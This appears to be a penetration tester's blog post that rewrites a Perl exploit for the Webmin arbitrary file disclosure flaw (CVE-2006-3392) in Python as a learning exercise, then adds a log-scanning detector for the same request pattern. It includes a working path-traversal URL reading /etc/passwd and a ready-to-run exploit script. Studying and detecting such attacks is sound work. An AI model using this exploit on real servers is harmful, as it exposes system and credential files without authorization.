Rewriting Exploits: Webmin Arbitrary File Disclosure
by Vince, in Blog
Penetration testers come from all walks of life, but there are two obvious sources I see most often: IT and development. Each comes with advantages, but eventually we need to fill in the gaps with the knowledge of the other. My background is in IT and my skills in system and network administration run deep. I'm filling in the software development gaps, though.
If you're starting out in penetration testing and you're like me, first you'll need to learn how to read code and get to a point where you understand what you're reading. It takes time, but eventually you'll see patterns and you'll recognize functions, variables, and other common syntax. You might not be able to write code from scratch at this point, but you'll be able to understand what's going on. Once you get to this level, pick a language and rewrite what you see.
I like Python. For no particular reason, I just like it. I heard someone say that when you want to learn a language, you should start by solving a problem. And once you can write code to solve problems, you should build something. I think it's equally helpful to take something written in one language and rewrite it in another. You already have the built example in front of you; you just want to use a different language to rebuild it.
I've been playing around with a vulnerable version of Webmin that can be exploited for an arbitrary file disclosure: CVE-2006-3392, Webmin Arbitrary File Disclosure.
Exploit-DB has a Perl exploit for it, EDB-ID 2017, and when you read through it, it's not too hard to understand what's going on.
It asks for the URL, port, filename, and target. It then appends "/unauthenticated/" and "/..%01" repeated 40 times. You can literally build this into a URL without using the script. It looks like this:
http://domain.com:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd
The above URL works for this exploit, but that's not what we're trying to accomplish here. We want to rewrite this Perl script in Python, which looks like this:
#!/usr/bin/python
# Exploit for Webmin < 1.29x
# CVE 2006-3392
# Arbitrary File Disclosure
#
# Python 2 (urllib2, raw_input, print statement), as in the original post.
import urllib2
import sys

print
print "[*] Enter target URL in the following format: http://www.domain.com:10000"
host = raw_input("[*] Enter target URL: ")
print
print "[*] Enter target file, for example: /etc/passwd"
file = raw_input("[*] Enter target file: ")

# Same path the Perl exploit builds: /unauthenticated followed by "/..%01" forty times
path = '/unauthenticated' + '/..%01'*40
combined = host + path + file

# Request the URL and echo the response body line by line
url = urllib2.urlopen(combined)
print
html = url.readlines()
for line in html:
    sys.stdout.write(line)
print
When the script is run, we are asked two questions, the target URL and the target file; the script does its thing and we get exactly the same outcome as with the Perl script.
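Flipping to the defender's side: the request pattern above is easy to spot in web-server logs once you percent-decode the path, because a filter that only looks for the literal "../" never sees the "..%01/" form. The following detector is an added example written for this post (not from the original post or the Perl exploit); the log lines are constructed, in a combined-log style, and the regex and function names are my own.

```python
# Added example (not from the original post): flag CVE-2006-3392-style
# traversal requests against Webmin's /unauthenticated/ handler in access logs.
import re
from urllib.parse import unquote

# Constructed sample log lines (combined-log style); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2013:10:00:00 +0000] "GET /unauthenticated/..%01/..%01/..%01/etc/passwd HTTP/1.1" 200 1841
10.0.0.6 - - [01/Jan/2013:10:00:01 +0000] "GET /unauthenticated/style.css HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2013:10:00:02 +0000] "GET /unauthenticated/../../etc/passwd HTTP/1.1" 403 0
10.0.0.8 - - [01/Jan/2013:10:00:03 +0000] "GET /index.cgi HTTP/1.1" 200 1024
"""

# Pull method and path out of the quoted request field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def normalize_path(raw_path):
    """Percent-decode, then drop control characters so '..%01/' becomes '../'.

    This is the step a naive '../' string match skips, which is why the
    encoded form slips past it."""
    decoded = unquote(raw_path)
    return "".join(ch for ch in decoded if ord(ch) >= 0x20)


def is_unauth_traversal(raw_path):
    """True if a request under /unauthenticated/ contains a '..' path segment."""
    if not raw_path.startswith("/unauthenticated/"):
        return False
    segments = normalize_path(raw_path).split("/")
    return ".." in segments


def scan_log(text):
    """Return (client_ip, raw_path) for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_unauth_traversal(m.group("path")):
            hits.append((line.split()[0], m.group("path")))
    return hits


if __name__ == "__main__":
    for ip, path in scan_log(SAMPLE_LOG):
        print(f"{ip} {path}")
```

Both the encoded request (served with a 200) and the plain "../" attempt (rejected with a 403) are flagged, since the attempt matters for detection regardless of whether the server blocked it.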